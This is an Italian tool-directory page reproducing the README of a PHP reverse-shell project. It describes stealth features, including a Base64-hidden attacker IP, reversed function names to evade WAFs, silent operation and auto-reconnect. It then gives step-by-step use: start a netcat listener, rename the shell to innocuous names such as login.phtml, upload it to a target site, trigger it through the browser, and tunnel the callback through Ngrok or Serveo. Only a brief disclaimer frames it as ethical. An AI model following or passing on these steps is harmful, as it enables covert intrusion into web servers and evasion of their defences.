Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PHP-REVERSE-SHELL — Questo è un potente e furtivo reverse shell PHP progettato per l'hacking etico e i test di penetrazione. Stabilisce una connessione affidabile e silenziosa verso la tua macchina. | Kitploit
Strumenti/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
Generazione di PayloadEvasione IDS/IPSSfruttamento di Applicazioni WebBypass WAFPenetration TestingCommand and ControlApprendimento e FormazioneRed TeamingStrumento di Accesso Remoto

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

Questo è un potente e furtivo reverse shell PHP progettato per l'hacking etico e i test di penetrazione. Stabilisce una connessione affidabile e silenziosa verso la tua macchina.

Vedi Repository
111 mesi faNon ancora revisionato

PHP Reverse Shell (Potente & Furtivo)

Questa è una shell inversa PHP potente e furtiva progettata per hacking etico e test di penetrazione. Stabilisce una connessione affidabile e silenziosa verso la tua macchina.

⚠️ Disclaimer

Questa shell inversa PHP è sviluppata strettamente per scopi educativi e di test di penetrazione autorizzati.
Lo sviluppatore non è responsabile per qualsiasi uso improprio, danno o attività illegale eseguita utilizzando questa reverse_shell.
Usa responsabilmente e solo su sistemi di proprietà o per i quali hai esplicita autorizzazione a testare. L'accesso non autorizzato è illegale e punibile per legge.

Caratteristiche

  • L'IP e il comando shell sono codificati in Base64 per la furtività

  • I nomi delle funzioni sono invertiti per bypassare WAF e filtri di sicurezza

  • Modalità silenziosa — nessun output visualizzato per evitare il rilevamento

  • Si riconnette automaticamente se la connessione cade

  • Può funzionare come demone in background (se il server lo supporta)

  • Funziona sulla maggior parte dei server con PHP abilitato

  • Supporta servizi di tunneling come Ngrok, Serveo

  • Carica con estensione .phtml per bypassare alcuni filtri

Come Usare

1. Avvia un listener sulla tua macchina

root@kitploit:~
nc -lvnp 4444

2. Codifica il tuo IP o hostname in Base64

Usa questo semplice comando:

root@kitploit:~
echo "your_ip_or_hostname" | base64

Esempio:

root@kitploit:~
echo "192.168.1.5" | base64

Copia l'output e sostituisci il valore $ip_b64 nello script della shell inversa PHP.

3. Aggiorna il tuo script della shell inversa PHP:

Modifica queste righe con il tuo IP/hostname codificato in Base64 e la porta:

root@kitploit:~
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;

4. Rinomina il file e caricalo

Rinomina il file con qualcosa di meno sospetto, ad esempio:

  • login.phtml

  • avatar.phtml

  • update.phtml

Usare l'estensione .phtml aiuta il file a funzionare su alcuni server che bloccano .php.

Carica questo file sul sito web target dove sono consentiti i caricamenti.

5. Attiva la shell inversa

Apri il file caricato in un browser:

root@kitploit:~
http://target.com/uploads/login.phtml

Una volta aperto, il tuo listener riceverà una connessione di shell inversa.

Utilizzo del Tunneling (Quando il Tuo IP Non è Pubblico)

Se stai usando dati mobili o sei dietro a un router (NAT), il tuo IP potrebbe non essere pubblico. In tal caso, la shell inversa non può raggiungere direttamente la tua macchina.

Per risolvere, usa strumenti di tunneling TCP come Ngrok o Serveo.

Ngrok (Consigliato)

Installa Ngrok
Esegui questo comando:

root@kitploit:~
ngrok tcp 4444

Mostrerà qualcosa come:

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

Aggiorna il tuo script della shell inversa PHP:

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

Avvia il tuo listener:

root@kitploit:~
nc -lvnp 4444

Serveo

Esegui questo comando:

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

Dirà qualcosa come:

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

Aggiorna il tuo script della shell inversa PHP:

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

Avvia il tuo listener:

root@kitploit:~
nc -lvnp 4444

Licenza

Questo progetto è concesso in licenza sotto GNU General Public License v3.0

Scarica lo strumento